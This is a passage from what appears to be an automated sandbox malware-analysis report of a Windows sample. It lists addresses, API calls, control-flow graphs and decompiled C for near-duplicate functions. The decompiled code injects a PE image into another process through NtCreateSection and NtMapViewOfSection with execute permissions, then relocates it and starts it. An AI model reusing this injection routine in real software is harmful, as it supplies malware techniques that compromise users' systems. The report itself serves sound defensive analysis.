				_t131 =  *_t204;
				return L0040119E(_t91, _t131, _t174, _t229);
			}














































                                                          0x004014bf
                                                          0x004014bc
                                                          0x004014cc
                                                          0x004014d1
                                                          0x004014d4
                                                          0x004014de
                                                          0x004014e3
                                                          0x004014e6
                                                          0x004014e8
                                                          0x004014f1
                                                          0x004014f3
                                                          0x004014f3
                                                          0x004014f6
                                                          0x004014f6
                                                          0x004014fb
                                                          0x00000000
                                                          0x00000000
                                                          0x00401829
                                                          0x00401829
                                                          0x00401501
                                                          0x00401504
                                                          0x00401507
                                                          0x0040150b
                                                          0x0040150e
                                                          0x00401512
                                                          0x00401518
                                                          0x0040151b
                                                          0x0040151d
                                                          0x00401520
                                                          0x00401526
                                                          0x00401529
                                                          0x00401537
                                                          0x00401538
                                                          0x00401539
                                                          0x0040153b
                                                          0x00401541
                                                          0x00401564
                                                          0x00401567
                                                          0x0040156a
                                                          0x0040156d
                                                          0x00401573
                                                          0x00401588
                                                          0x0040158d
                                                          0x00401590
                                                          0x00401593
                                                          0x004015ab
                                                          0x004015ad
                                                          0x004015b0
                                                          0x004015c9
                                                          0x004015cb
                                                          0x004015d5
                                                          0x004015db
                                                          0x004015e1
                                                          0x004015e1
                                                          0x004015c9
                                                          0x004015ab
                                                          0x004015e4
                                                          0x004015f0
                                                          0x004015f3
                                                          0x004015f5
                                                          0x0040160a
                                                          0x0040161d
                                                          0x00401620
                                                          0x00401623
                                                          0x0040163b
                                                          0x00401641
                                                          0x00401644
                                                          0x0040165b
                                                          0x0040165d
                                                          0x00401663
                                                          0x00401668
                                                          0x00401668
                                                          0x00401672
                                                          0x00401699
                                                          0x004016a1
                                                          0x004016c5
                                                          0x004016c6
                                                          0x004016c9
                                                          0x004016e1
                                                          0x004016f0
                                                          0x004016f8
                                                          0x004016fd
                                                          0x00401706
                                                          0x0040170f
                                                          0x0040171b
                                                          0x0040171d
                                                          0x00401721
                                                          0x00401722
                                                          0x00401728
                                                          0x00401732
                                                          0x00401732
                                                          0x0040172a
                                                          0x0040172a
                                                          0x0040172a
                                                          0x00401738
                                                          0x00401739
                                                          0x0040173e
                                                          0x0040174c
                                                          0x0040174c
                                                          0x0040174c
                                                          0x00401752
                                                          0x00401754
                                                          0x00401755
                                                          0x00401759
                                                          0x004017c1
                                                          0x004017c5
                                                          0x004017d0
                                                          0x004017d0
                                                          0x004017d3
                                                          0x004017d3
                                                          0x004017d6
                                                          0x00000000
                                                          0x00000000
                                                          0x004017d8
                                                          0x004017e2
                                                          0x004017e7
                                                          0x004017e9
                                                          0x004017ee
                                                          0x004017fa
                                                          0x004017fa
                                                          0x004017fa
                                                          0x004017fc
                                                          0x004017fc
                                                          0x00401800
                                                          0x00401807
                                                          0x00401807
                                                          0x00401809
                                                          0x0040180c
                                                          0x0040181c
                                                          0x0040175b
                                                          0x0040175b
                                                          0x00401760
                                                          0x00401761
                                                          0x00401777
                                                          0x00401786
                                                          0x00401793
                                                          0x004017aa
                                                          0x004017b8
                                                          0x004017b8
                                                          0x00401759
                                                          0x0040165d
                                                          0x0040163b
                                                          0x0040160a
                                                          0x00401541
                                                          0x0040183d
                                                          0x0040184b
                                                          0x00401850
                                                          0x00401866

                                                          APIs
                                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,?,?,00000002), ref: 00401556
                                                          • NtCreateSection.NTDLL(?,00000006,?,?,00000004,08000000,?,?,?,00000002), ref: 00401583
                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000004,08000000), ref: 004015A6
                                                          • NtMapViewOfSection.NTDLL(?,?,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000000,00000001), ref: 004015C4
                                                          • NtCreateSection.NTDLL(?,0000000E,?,?,00000040,08000000,?,?,?,00000004,08000000,?,?,?,00000002), ref: 00401605
                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000040,08000000), ref: 00401636
                                                          • NtMapViewOfSection.NTDLL(?,?,?,?,?,?,00000000,00000001,?,00000020,?,?,?,00000000,00000001), ref: 00401658
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.377648460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                          Similarity
                                                          • API ID: Section$View$Create$DuplicateObject
                                                          • String ID:
                                                          • API String ID: 1546783058-0
                                                          • Opcode ID: d6868da5ad0cc6704b0b456fa49984c9b80f10e5cd5d9e7629ddc67eaa61c955
                                                          • Instruction ID: 07d304ea65bb56911e0060c1c25482d61d12f4ba10f26ae25195bb01424c625b
                                                          • Opcode Fuzzy Hash: d6868da5ad0cc6704b0b456fa49984c9b80f10e5cd5d9e7629ddc67eaa61c955
                                                          • Instruction Fuzzy Hash: 345106B1900245BFEB219F91CC48FEBBBB9EF85B10F104129FA11AA2E5D7749941CB64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004014DA Relevance: 10.7, APIs: 7, Instructions: 165nativeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 282 4014da-4014f1 call 40119e 288 4014f3 282->288 289 4014f6-4014fb 282->289 288->289 291 401501-401512 289->291 292 401824-40182c 289->292 296 401822 291->296 297 401518-401541 291->297 292->289 295 401831-401842 292->295 299 401845-401866 call 40119e 295->299 300 401838-40183e 295->300 296->295 297->296 307 401547-40155e NtDuplicateObject 297->307 300->299 307->296 309 401564-401588 NtCreateSection 307->309 311 4015e4-40160a NtCreateSection 309->311 312 40158a-4015ab NtMapViewOfSection 309->312 311->296 314 401610-401614 311->314 312->311 313 4015ad-4015c9 NtMapViewOfSection 312->313 313->311 315 4015cb-4015e1 313->315 314->296 316 40161a-40163b NtMapViewOfSection 314->316 315->311 316->296 317 401641-40165d NtMapViewOfSection 316->317 317->296 319 401663 call 401668 317->319
                                                          C-Code - Quality: 62%
                                                          			E004014DA(void* __ebx, void* __edi, void* __eflags) {
				void* _t84;
				intOrPtr _t87;
				long _t90;
				void* _t91;
				struct _GUID _t98;
				struct _GUID _t100;
				PVOID* _t102;
				PVOID* _t104;
				intOrPtr _t106;
				intOrPtr* _t108;
				PVOID* _t121;
				PVOID* _t123;
				intOrPtr _t128;
				intOrPtr _t130;
				intOrPtr _t131;
				long* _t132;
				signed int _t139;
				int _t140;
				signed int _t159;
				signed int _t160;
				signed int _t161;
				void* _t162;
				intOrPtr* _t163;
				void* _t166;
				long _t174;
				intOrPtr _t176;
				void* _t177;
				long* _t183;
				intOrPtr* _t185;
				HANDLE* _t186;
				HANDLE* _t187;
				void* _t192;
				void* _t193;
				intOrPtr* _t196;
				void* _t197;
				void* _t200;
				void* _t201;
				intOrPtr* _t203;
				intOrPtr* _t204;
				void* _t207;
				intOrPtr* _t208;
				void* _t209;
				long _t224;

				_pop(_t84);
				_push(0x37f);
				_t130 =  *_t203;
				_t204 = _t203 + 4;
				L0040119E(_t84, _t130, __edi, __eflags);
				_t128 =  *((intOrPtr*)(_t201 + 8));
				_t174 = 0;
				 *((intOrPtr*)(_t201 - 0x34)) = 0;
				if(gs != 0) {
					 *((intOrPtr*)(_t201 - 0x34)) =  *((intOrPtr*)(_t201 - 0x34)) + 1;
				}
				while(1) {
					_t87 =  *((intOrPtr*)(_t128 + 0x48))();
					if(_t87 != 0) {
						break;
					}
					 *((intOrPtr*)(_t128 + 0x1c))(0x3e8);
				}
				 *((intOrPtr*)(_t201 - 0x5c)) = _t87;
				_t183 = _t201 - 0x60;
				 *_t183 = _t174;
				 *((intOrPtr*)(_t128 + 0x4c))(_t87, _t183);
				_t90 =  *_t183;
				if(_t90 != 0) {
					_t132 = _t201 - 0x30;
					 *_t132 = _t90;
					_t132[1] = _t174;
					_t185 = _t201 - 0x28;
					 *((intOrPtr*)(_t128 + 0x10))(_t185, 0x18);
					 *_t185 = 0x18;
					_push(_t201 - 0x30);
					_push(_t185);
					_push(0x40);
					_push(_t201 - 0x10);
					if( *((intOrPtr*)(_t128 + 0x70))() == 0 && NtDuplicateObject( *(_t201 - 0x10), 0xffffffff, 0xffffffff, _t201 - 0xc, _t174, _t174, 2) == 0) {
						 *(_t201 - 8) = _t174;
						_t98 = _t201 - 0x50;
						 *(_t98 + 4) = _t174;
						 *_t98 = 0x5000;
						_t186 = _t201 - 0x54;
						if(NtCreateSection(_t186, 6, _t174, _t98, 4, 0x8000000, _t174) == 0) {
							 *_t25 =  *(_t201 - 0x50);
							_t121 = _t201 - 0x44;
							 *_t121 = _t174;
							if(NtMapViewOfSection( *_t186, 0xffffffff, _t121, _t174, _t174, _t174, _t201 - 0x38, 1, _t174, 4) == 0) {
								_t123 = _t201 - 0x3c;
								 *_t123 = _t174;
								if(NtMapViewOfSection( *_t186,  *(_t201 - 0xc), _t123, _t174, _t174, _t174, _t201 - 0x38, 1, _t174, 4) == 0) {
									_t200 =  *(_t201 - 0x44);
									 *((intOrPtr*)(_t128 + 0x20))(_t174, _t200, 0x104);
									 *((intOrPtr*)(_t200 + 0x208)) =  *((intOrPtr*)(_t201 + 0x14));
									 *(_t201 - 8) =  *(_t201 - 8) + 1;
								}
							}
						}
						_t100 = _t201 - 0x50;
						 *(_t100 + 4) = _t174;
						 *_t100 =  *((intOrPtr*)(_t201 + 0x10)) + 0x10000;
						_t187 = _t201 - 0x58;
						if(NtCreateSection(_t187, 0xe, _t174, _t100, 0x40, 0x8000000, _t174) == 0 &&  *(_t201 - 8) != 0) {
							 *_t46 =  *(_t201 - 0x50);
							_t102 = _t201 - 0x48;
							 *_t102 = _t174;
							if(NtMapViewOfSection( *_t187, 0xffffffff, _t102, _t174, _t174, _t174, _t201 - 0x38, 1, _t174, 4) == 0) {
								_t104 = _t201 - 0x40;
								 *_t104 = _t174;
								_t224 = NtMapViewOfSection( *_t187,  *(_t201 - 0xc), _t104, _t174, _t174, _t174, _t201 - 0x38, 1, _t174, 0x20);
								if(_t224 == 0) {
									L18();
									if(_t224 == 0 && _t224 != 0) {
									}
									_t207 = _t204 + 4;
									_push(0x2e62);
									_t208 = _t207 + 4;
									_push(0x2260);
									_t106 =  *_t208;
									_t209 = _t208 + 4;
									_t159 = (0x2260 << 5) + _t106;
									asm("lodsb");
									_t160 = _t159;
									asm("loop 0xffffffc2");
									_t161 = _t160 ^ 0xbcc951dd;
									_t204 = _t209 - _t161;
									_t192 =  *((intOrPtr*)(_t201 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t201 + 0xc))));
									_t139 =  *(_t192 + 6) & 0x0000ffff;
									_push(_t192);
									_t162 = _t192;
									if( *((intOrPtr*)(_t201 - 0x34)) == 0) {
										_t163 = _t162 + 0xf8;
										__eflags = _t163;
									} else {
										_t163 = _t162 + 0x108;
									}
									_push(_t139);
									_t140 =  *(_t163 + 0x10);
									if(_t140 != 0) {
										memcpy( *((intOrPtr*)(_t163 + 0xc)) +  *(_t201 - 0x48),  *((intOrPtr*)(_t163 + 0x14)) +  *((intOrPtr*)(_t201 + 0xc)), _t140);
										_t204 = _t204 + 0xc;
									}
									asm("loop 0xffffffe6");
									_pop(_t193);
									_t229 =  *((intOrPtr*)(_t201 - 0x34));
									if( *((intOrPtr*)(_t201 - 0x34)) == 0) {
										_push(_t193);
										_t166 =  *((intOrPtr*)(_t193 + 0x34)) -  *(_t201 - 0x40);
										_t196 =  *((intOrPtr*)(_t193 + 0xa0)) +  *(_t201 - 0x48);
										__eflags = _t196;
										while(1) {
											__eflags =  *_t196;
											if( *_t196 == 0) {
												break;
											}
											_t176 =  *_t196;
											_t196 = _t196 + 8;
											asm("lodsw");
											__eflags = 0;
											if(0 != 0) {
												 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) - _t166;
												__eflags =  *((intOrPtr*)(0 +  *(_t201 - 0x48) + _t176));
											}
											asm("loop 0xffffffe9");
										}
										_pop(_t197);
										_t174 = 0;
										__eflags = 0;
										_t108 = _t201 - 4;
										 *_t108 = 0;
										 *((intOrPtr*)(_t128 + 0x98))( *(_t201 - 0xc), 0, 0, 0, 0, 0,  *((intOrPtr*)(_t197 + 0x28)) +  *(_t201 - 0x40),  *(_t201 - 0x3c), _t108, 0);
									} else {
										L51();
										_pop(_t177);
										_t174 = _t177 - 0x1760;
										 *((intOrPtr*)(_t174 + 0x1794)) = _t174 + 0x2c17;
										L00401227(_t128, _t174, _t229, _t174 + 0x2c17, 0x1ad);
										0x33();
										 *((intOrPtr*)(_t174 + 0x17b9)) = _t174 + 0x2c67;
										0x33();
									}
								}
							}
						}
					}
				}
				_t91 = 0x14e3;
				_push(0x37f);
				_t131 =  *_t204;
				return L0040119E(_t91, _t131, _t174, _t229);
			}














































                                                          0x004014da
                                                          0x004014cc
                                                          0x004014d1
                                                          0x004014d4
                                                          0x004014de
                                                          0x004014e3
                                                          0x004014e6
                                                          0x004014e8
                                                          0x004014f1
                                                          0x004014f3
                                                          0x004014f3
                                                          0x004014f6
                                                          0x004014f6
                                                          0x004014fb
                                                          0x00000000
                                                          0x00000000
                                                          0x00401829
                                                          0x00401829
                                                          0x00401501
                                                          0x00401504
                                                          0x00401507
                                                          0x0040150b
                                                          0x0040150e
                                                          0x00401512
                                                          0x00401518
                                                          0x0040151b
                                                          0x0040151d
                                                          0x00401520
                                                          0x00401526
                                                          0x00401529
                                                          0x00401537
                                                          0x00401538
                                                          0x00401539
                                                          0x0040153b
                                                          0x00401541
                                                          0x00401564
                                                          0x00401567
                                                          0x0040156a
                                                          0x0040156d
                                                          0x00401573
                                                          0x00401588
                                                          0x0040158d
                                                          0x00401590
                                                          0x00401593
                                                          0x004015ab
                                                          0x004015ad
                                                          0x004015b0
                                                          0x004015c9
                                                          0x004015cb
                                                          0x004015d5
                                                          0x004015db
                                                          0x004015e1
                                                          0x004015e1
                                                          0x004015c9
                                                          0x004015ab
                                                          0x004015e4
                                                          0x004015f0
                                                          0x004015f3
                                                          0x004015f5
                                                          0x0040160a
                                                          0x0040161d
                                                          0x00401620
                                                          0x00401623
                                                          0x0040163b
                                                          0x00401641
                                                          0x00401644
                                                          0x0040165b
                                                          0x0040165d
                                                          0x00401663
                                                          0x00401668
                                                          0x00401668
                                                          0x00401672
                                                          0x00401699
                                                          0x004016a1
                                                          0x004016c5
                                                          0x004016c6
                                                          0x004016c9
                                                          0x004016e1
                                                          0x004016f0
                                                          0x004016f8
                                                          0x004016fd
                                                          0x00401706
                                                          0x0040170f
                                                          0x0040171b
                                                          0x0040171d
                                                          0x00401721
                                                          0x00401722
                                                          0x00401728
                                                          0x00401732
                                                          0x00401732
                                                          0x0040172a
                                                          0x0040172a
                                                          0x0040172a
                                                          0x00401738
                                                          0x00401739
                                                          0x0040173e
                                                          0x0040174c
                                                          0x0040174c
                                                          0x0040174c
                                                          0x00401752
                                                          0x00401754
                                                          0x00401755
                                                          0x00401759
                                                          0x004017c1
                                                          0x004017c5
                                                          0x004017d0
                                                          0x004017d0
                                                          0x004017d3
                                                          0x004017d3
                                                          0x004017d6
                                                          0x00000000
                                                          0x00000000
                                                          0x004017d8
                                                          0x004017e2
                                                          0x004017e7
                                                          0x004017e9
                                                          0x004017ee
                                                          0x004017fa
                                                          0x004017fa
                                                          0x004017fa
                                                          0x004017fc
                                                          0x004017fc
                                                          0x00401800
                                                          0x00401807
                                                          0x00401807
                                                          0x00401809
                                                          0x0040180c
                                                          0x0040181c
                                                          0x0040175b
                                                          0x0040175b
                                                          0x00401760
                                                          0x00401761
                                                          0x00401777
                                                          0x00401786
                                                          0x00401793
                                                          0x004017aa
                                                          0x004017b8
                                                          0x004017b8
                                                          0x00401759
                                                          0x0040165d
                                                          0x0040163b
                                                          0x0040160a
                                                          0x00401541
                                                          0x0040183d
                                                          0x0040184b
                                                          0x00401850
                                                          0x00401866

                                                          APIs
                                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,?,?,00000002), ref: 00401556
                                                          • NtCreateSection.NTDLL(?,00000006,?,?,00000004,08000000,?,?,?,00000002), ref: 00401583
                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000004,08000000), ref: 004015A6
                                                          • NtMapViewOfSection.NTDLL(?,?,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000000,00000001), ref: 004015C4
                                                          • NtCreateSection.NTDLL(?,0000000E,?,?,00000040,08000000,?,?,?,00000004,08000000,?,?,?,00000002), ref: 00401605
                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000040,08000000), ref: 00401636
                                                          • NtMapViewOfSection.NTDLL(?,?,?,?,?,?,00000000,00000001,?,00000020,?,?,?,00000000,00000001), ref: 00401658
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.377648460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                          Similarity
                                                          • API ID: Section$View$Create$DuplicateObject
                                                          • String ID:
                                                          • API String ID: 1546783058-0
                                                          • Opcode ID: 1846bf87db7033a62c75dde9dc562bd107ea8d68f2b408ae9b5850e6d891a0cc
                                                          • Instruction ID: fcafa90473e3bce6dbc0f334a66e4de9b25c1110b2005182b8d4e3deb893a7aa
                                                          • Opcode Fuzzy Hash: 1846bf87db7033a62c75dde9dc562bd107ea8d68f2b408ae9b5850e6d891a0cc
                                                          • Instruction Fuzzy Hash: 515107B1900245BFEB219F91CC48FEFBBB9EF85B10F104129FA11AA2A5D7709945CB64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004014DD Relevance: 10.7, APIs: 7, Instructions: 160nativeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 321 4014dd-4014f1 call 40119e 325 4014f3 321->325 326 4014f6-4014fb 321->326 325->326 328 401501-401512 326->328 329 401824-40182c 326->329 333 401822 328->333 334 401518-401541 328->334 329->326 332 401831-401842 329->332 336 401845-401866 call 40119e 332->336 337 401838-40183e 332->337 333->332 334->333 344 401547-40155e NtDuplicateObject 334->344 337->336 344->333 346 401564-401588 NtCreateSection 344->346 348 4015e4-40160a NtCreateSection 346->348 349 40158a-4015ab NtMapViewOfSection 346->349 348->333 351 401610-401614 348->351 349->348 350 4015ad-4015c9 NtMapViewOfSection 349->350 350->348 352 4015cb-4015e1 350->352 351->333 353 40161a-40163b NtMapViewOfSection 351->353 352->348 353->333 354 401641-40165d NtMapViewOfSection 353->354 354->333 356 401663 call 401668 354->356
                                                          C-Code - Quality: 63%
                                                          			E004014DD(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __eflags) {
				void* _t84;
				intOrPtr _t87;
				long _t90;
				void* _t91;
				struct _GUID _t98;
				struct _GUID _t100;
				PVOID* _t102;
				PVOID* _t104;
				intOrPtr _t106;
				intOrPtr* _t108;
				PVOID* _t121;
				PVOID* _t123;
				intOrPtr _t128;
				intOrPtr _t131;
				long* _t132;
				signed int _t139;
				int _t140;
				signed int _t160;
				signed int _t161;
				signed int _t162;
				void* _t163;
				intOrPtr* _t164;
				void* _t167;
				long _t175;
				intOrPtr _t177;
				void* _t178;
				long* _t184;
				intOrPtr* _t186;
				HANDLE* _t187;
				HANDLE* _t188;
				void* _t193;
				void* _t194;
				intOrPtr* _t197;
				void* _t198;
				void* _t201;
				void* _t202;
				intOrPtr* _t204;
				void* _t207;
				intOrPtr* _t208;
				void* _t209;
				long _t224;

				L0040119E(_t84, __ecx, __edi, __eflags);
				_t128 =  *((intOrPtr*)(_t202 + 8));
				_t175 = 0;
				 *((intOrPtr*)(_t202 - 0x34)) = 0;
				if(gs != 0) {
					 *((intOrPtr*)(_t202 - 0x34)) =  *((intOrPtr*)(_t202 - 0x34)) + 1;
				}
				while(1) {
					_t87 =  *((intOrPtr*)(_t128 + 0x48))();
					if(_t87 != 0) {
						break;
					}
					 *((intOrPtr*)(_t128 + 0x1c))(0x3e8);
				}
				 *((intOrPtr*)(_t202 - 0x5c)) = _t87;
				_t184 = _t202 - 0x60;
				 *_t184 = _t175;
				 *((intOrPtr*)(_t128 + 0x4c))(_t87, _t184);
				_t90 =  *_t184;
				if(_t90 != 0) {
					_t132 = _t202 - 0x30;
					 *_t132 = _t90;
					_t132[1] = _t175;
					_t186 = _t202 - 0x28;
					 *((intOrPtr*)(_t128 + 0x10))(_t186, 0x18);
					 *_t186 = 0x18;
					_push(_t202 - 0x30);
					_push(_t186);
					_push(0x40);
					_push(_t202 - 0x10);
					if( *((intOrPtr*)(_t128 + 0x70))() == 0 && NtDuplicateObject( *(_t202 - 0x10), 0xffffffff, 0xffffffff, _t202 - 0xc, _t175, _t175, 2) == 0) {
						 *(_t202 - 8) = _t175;
						_t98 = _t202 - 0x50;
						 *(_t98 + 4) = _t175;
						 *_t98 = 0x5000;
						_t187 = _t202 - 0x54;
						if(NtCreateSection(_t187, 6, _t175, _t98, 4, 0x8000000, _t175) == 0) {
							 *_t25 =  *(_t202 - 0x50);
							_t121 = _t202 - 0x44;
							 *_t121 = _t175;
							if(NtMapViewOfSection( *_t187, 0xffffffff, _t121, _t175, _t175, _t175, _t202 - 0x38, 1, _t175, 4) == 0) {
								_t123 = _t202 - 0x3c;
								 *_t123 = _t175;
								if(NtMapViewOfSection( *_t187,  *(_t202 - 0xc), _t123, _t175, _t175, _t175, _t202 - 0x38, 1, _t175, 4) == 0) {
									_t201 =  *(_t202 - 0x44);
									 *((intOrPtr*)(_t128 + 0x20))(_t175, _t201, 0x104);
									 *((intOrPtr*)(_t201 + 0x208)) =  *((intOrPtr*)(_t202 + 0x14));
									 *(_t202 - 8) =  *(_t202 - 8) + 1;
								}
							}
						}
						_t100 = _t202 - 0x50;
						 *(_t100 + 4) = _t175;
						 *_t100 =  *((intOrPtr*)(_t202 + 0x10)) + 0x10000;
						_t188 = _t202 - 0x58;
						if(NtCreateSection(_t188, 0xe, _t175, _t100, 0x40, 0x8000000, _t175) == 0 &&  *(_t202 - 8) != 0) {
							 *_t46 =  *(_t202 - 0x50);
							_t102 = _t202 - 0x48;
							 *_t102 = _t175;
							if(NtMapViewOfSection( *_t188, 0xffffffff, _t102, _t175, _t175, _t175, _t202 - 0x38, 1, _t175, 4) == 0) {
								_t104 = _t202 - 0x40;
								 *_t104 = _t175;
								_t224 = NtMapViewOfSection( *_t188,  *(_t202 - 0xc), _t104, _t175, _t175, _t175, _t202 - 0x38, 1, _t175, 0x20);
								if(_t224 == 0) {
									L16();
									if(_t224 == 0 && _t224 != 0) {
									}
									_t207 = _t204 + 4;
									_push(0x2e62);
									_t208 = _t207 + 4;
									_push(0x2260);
									_t106 =  *_t208;
									_t209 = _t208 + 4;
									_t160 = (0x2260 << 5) + _t106;
									asm("lodsb");
									_t161 = _t160;
									asm("loop 0xffffffc2");
									_t162 = _t161 ^ 0xbcc951dd;
									_t204 = _t209 - _t162;
									_t193 =  *((intOrPtr*)(_t202 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t202 + 0xc))));
									_t139 =  *(_t193 + 6) & 0x0000ffff;
									_push(_t193);
									_t163 = _t193;
									if( *((intOrPtr*)(_t202 - 0x34)) == 0) {
										_t164 = _t163 + 0xf8;
										__eflags = _t164;
									} else {
										_t164 = _t163 + 0x108;
									}
									_push(_t139);
									_t140 =  *(_t164 + 0x10);
									if(_t140 != 0) {
										memcpy( *((intOrPtr*)(_t164 + 0xc)) +  *(_t202 - 0x48),  *((intOrPtr*)(_t164 + 0x14)) +  *((intOrPtr*)(_t202 + 0xc)), _t140);
										_t204 = _t204 + 0xc;
									}
									asm("loop 0xffffffe6");
									_pop(_t194);
									_t229 =  *((intOrPtr*)(_t202 - 0x34));
									if( *((intOrPtr*)(_t202 - 0x34)) == 0) {
										_push(_t194);
										_t167 =  *((intOrPtr*)(_t194 + 0x34)) -  *(_t202 - 0x40);
										_t197 =  *((intOrPtr*)(_t194 + 0xa0)) +  *(_t202 - 0x48);
										__eflags = _t197;
										while(1) {
											__eflags =  *_t197;
											if( *_t197 == 0) {
												break;
											}
											_t177 =  *_t197;
											_t197 = _t197 + 8;
											asm("lodsw");
											__eflags = 0;
											if(0 != 0) {
												 *((intOrPtr*)(0)) =  *((intOrPtr*)(0)) - _t167;
												__eflags =  *((intOrPtr*)(0 +  *(_t202 - 0x48) + _t177));
											}
											asm("loop 0xffffffe9");
										}
										_pop(_t198);
										_t175 = 0;
										__eflags = 0;
										_t108 = _t202 - 4;
										 *_t108 = 0;
										 *((intOrPtr*)(_t128 + 0x98))( *(_t202 - 0xc), 0, 0, 0, 0, 0,  *((intOrPtr*)(_t198 + 0x28)) +  *(_t202 - 0x40),  *(_t202 - 0x3c), _t108, 0);
									} else {
										L49();
										_pop(_t178);
										_t175 = _t178 - 0x1760;
										 *((intOrPtr*)(_t175 + 0x1794)) = _t175 + 0x2c17;
										L00401227(_t128, _t175, _t229, _t175 + 0x2c17, 0x1ad);
										0x33();
										 *((intOrPtr*)(_t175 + 0x17b9)) = _t175 + 0x2c67;
										0x33();
									}
								}
							}
						}
					}
				}
				_t91 = 0x14e3;
				_push(0x37f);
				_t131 =  *_t204;
				return L0040119E(_t91, _t131, _t175, _t229);
			}












































                                                          0x004014de
                                                          0x004014e3
                                                          0x004014e6
                                                          0x004014e8
                                                          0x004014f1
                                                          0x004014f3
                                                          0x004014f3
                                                          0x004014f6
                                                          0x004014f6
                                                          0x004014fb
                                                          0x00000000
                                                          0x00000000
                                                          0x00401829
                                                          0x00401829
                                                          0x00401501
                                                          0x00401504
                                                          0x00401507
                                                          0x0040150b
                                                          0x0040150e
                                                          0x00401512
                                                          0x00401518
                                                          0x0040151b
                                                          0x0040151d
                                                          0x00401520
                                                          0x00401526
                                                          0x00401529
                                                          0x00401537
                                                          0x00401538
                                                          0x00401539
                                                          0x0040153b
                                                          0x00401541
                                                          0x00401564
                                                          0x00401567
                                                          0x0040156a
                                                          0x0040156d
                                                          0x00401573
                                                          0x00401588
                                                          0x0040158d
                                                          0x00401590
                                                          0x00401593
                                                          0x004015ab
                                                          0x004015ad
                                                          0x004015b0
                                                          0x004015c9
                                                          0x004015cb
                                                          0x004015d5
                                                          0x004015db
                                                          0x004015e1
                                                          0x004015e1
                                                          0x004015c9
                                                          0x004015ab
                                                          0x004015e4
                                                          0x004015f0
                                                          0x004015f3
                                                          0x004015f5
                                                          0x0040160a
                                                          0x0040161d
                                                          0x00401620
                                                          0x00401623
                                                          0x0040163b
                                                          0x00401641
                                                          0x00401644
                                                          0x0040165b
                                                          0x0040165d
                                                          0x00401663
                                                          0x00401668
                                                          0x00401668
                                                          0x00401672
                                                          0x00401699
                                                          0x004016a1
                                                          0x004016c5
                                                          0x004016c6
                                                          0x004016c9
                                                          0x004016e1
                                                          0x004016f0
                                                          0x004016f8
                                                          0x004016fd
                                                          0x00401706
                                                          0x0040170f
                                                          0x0040171b
                                                          0x0040171d
                                                          0x00401721
                                                          0x00401722
                                                          0x00401728
                                                          0x00401732
                                                          0x00401732
                                                          0x0040172a
                                                          0x0040172a
                                                          0x0040172a
                                                          0x00401738
                                                          0x00401739
                                                          0x0040173e
                                                          0x0040174c
                                                          0x0040174c
                                                          0x0040174c
                                                          0x00401752
                                                          0x00401754
                                                          0x00401755
                                                          0x00401759
                                                          0x004017c1
                                                          0x004017c5
                                                          0x004017d0
                                                          0x004017d0
                                                          0x004017d3
                                                          0x004017d3
                                                          0x004017d6
                                                          0x00000000
                                                          0x00000000
                                                          0x004017d8
                                                          0x004017e2
                                                          0x004017e7
                                                          0x004017e9
                                                          0x004017ee
                                                          0x004017fa
                                                          0x004017fa
                                                          0x004017fa
                                                          0x004017fc
                                                          0x004017fc
                                                          0x00401800
                                                          0x00401807
                                                          0x00401807
                                                          0x00401809
                                                          0x0040180c
                                                          0x0040181c
                                                          0x0040175b
                                                          0x0040175b
                                                          0x00401760
                                                          0x00401761
                                                          0x00401777
                                                          0x00401786
                                                          0x00401793
                                                          0x004017aa
                                                          0x004017b8
                                                          0x004017b8
                                                          0x00401759
                                                          0x0040165d
                                                          0x0040163b
                                                          0x0040160a
                                                          0x00401541
                                                          0x0040183d
                                                          0x0040184b
                                                          0x00401850
                                                          0x00401866

                                                          APIs
                                                          • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,?,?,00000002), ref: 00401556
                                                          • NtCreateSection.NTDLL(?,00000006,?,?,00000004,08000000,?,?,?,00000002), ref: 00401583
                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000004,08000000), ref: 004015A6
                                                          • NtMapViewOfSection.NTDLL(?,?,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000000,00000001), ref: 004015C4
                                                          • NtCreateSection.NTDLL(?,0000000E,?,?,00000040,08000000,?,?,?,00000004,08000000,?,?,?,00000002), ref: 00401605
                                                          • NtMapViewOfSection.NTDLL(?,000000FF,?,?,?,?,00000000,00000001,?,00000004,?,?,?,00000040,08000000), ref: 00401636
                                                          • NtMapViewOfSection.NTDLL(?,?,?,?,?,?,00000000,00000001,?,00000020,?,?,?,00000000,00000001), ref: 00401658
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.377648460.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                          Similarity
                                                          • API ID: Section$View$Create$DuplicateObject
                                                          • String ID:
                                                          • API String ID: 1546783058-0
